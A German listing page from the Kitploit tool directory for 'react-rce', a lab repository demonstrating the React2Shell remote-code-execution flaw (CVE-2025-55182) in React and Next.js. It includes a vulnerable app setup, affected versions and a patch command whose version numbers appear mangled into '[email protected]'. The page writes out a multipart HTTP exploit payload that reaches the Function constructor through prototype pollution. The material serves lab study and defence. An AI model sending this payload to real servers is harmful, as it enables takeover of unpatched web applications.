Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
react-rce — Wir haben ein Beispiel für die Schwachstelle CVE-2025-55182 zusammen mit KI erstellt und getestet. | Kitploit
Tools/GitHubGitHub/randarts/react-rce
Exploit-FrameworksSchwachstellenanalyseWebanwendungs-ExploitationLernen & BildungPayload-EntwicklungLabs & Praxis
GitHubrandarts/react-rce

react-rce

Wir haben ein Beispiel für die Schwachstelle CVE-2025-55182 zusammen mit KI erstellt und getestet.

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 React2Shell Schwachstellenpraxis

Verwendete KI: Claude Opus 4.5 ⚠️ Warnung: Diese Umgebung ist nur für Bildungs- und Forschungszwecke bestimmt.

Schwachstellenübersicht

PunktInhalt
CVECVE-2025-55182 (React) / CVE-2025-66478 (Next.js)
NameReact2Shell
CVSS10.0 (Critical)
TypPre-Auth Remote Code Execution
UrsachePrototypverschmutzung bei der Deserialisierung des Flight-Protokolls

Angriffsprinzip

root@kitploit:~
                    ┌─────────────────────────┐
                    │     Angreifer            │
                    └───────────┬─────────────┘
                                │
                    POST-Anfrage + Next-Action-Header
                    multipart/form-data Payload
                                │
                                ▼
┌───────────────────────────────────────────────────────────┐
│                     Next.js-Server                        │
├───────────────────────────────────────────────────────────┤
│  1. Next-Action-Header → Server Action auslösen           │
│  2. multipart-Payload → Flight-Protokoll deserialisieren  │
│  3. then()-Methode des Fake-Chunk-Objekts aufrufen        │
│  4. __proto__-Referenz → Prototypverschmutzung            │
│  5. Function-Konstruktor injizieren → RCE                 │
└───────────────────────────────────────────────────────────┘

Exploit-Payload-Struktur

root@kitploit:~
POST / HTTP/1.1
Next-Action: x
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="0"

{"_response":{"_formData":{"get":"Function"}},"then":"$1:__proto__:then"}
------Boundary
Content-Disposition: form-data; name="1"

$@0
------Boundary--

Kernelemente:

  • Next-Action-Header zum Auslösen einer Server Action
  • Feld 0: Fake Chunk mit then-Methode für Promise-ähnliches Verhalten
  • Feld 1: $@0-Referenz zur Traversierung der Prototypkette
  • Zugriff auf den Function-Konstruktor über __proto__:then

Schnellstart

root@kitploit:~
cd vulnerable-app

# Abhängigkeiten installieren
npm install

# Entwicklungsserver starten
npm run dev

Unter http://localhost:3000 erreichbar


Verzeichnisstruktur

root@kitploit:~
react-rce/
├── README.md
├── vulnerable-app/          # Verwundbare Next.js-App
│   ├── package.json         # Next.js 15.0.3 (verwundbare Version)
│   └── app/
│       ├── page.js          # UI (CVE-Info + RCE-Demo)
│       ├── actions.js       # Server Actions
│       └── globals.css
└── exploit/                 # Angriffswerkzeuge (optional)
    └── exploit.py           # CVE-2025-55182 PoC

Betroffene Versionen

  • React: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: 15.x, 16.x (bei Verwendung des App-Routers)
  • Pakete: react-server-dom-webpack, react-server-dom-turbopack

Abwehrmaßnahmen

root@kitploit:~
# Upgrade auf Patch-Versionen
npm install [email protected] [email protected] [email protected]

Referenzen

  • Next.js Sicherheitshinweis
  • GitHub: assetnote/react2shell-scanner
  • GitHub: freeqaz/react2shell
Tool herunterladen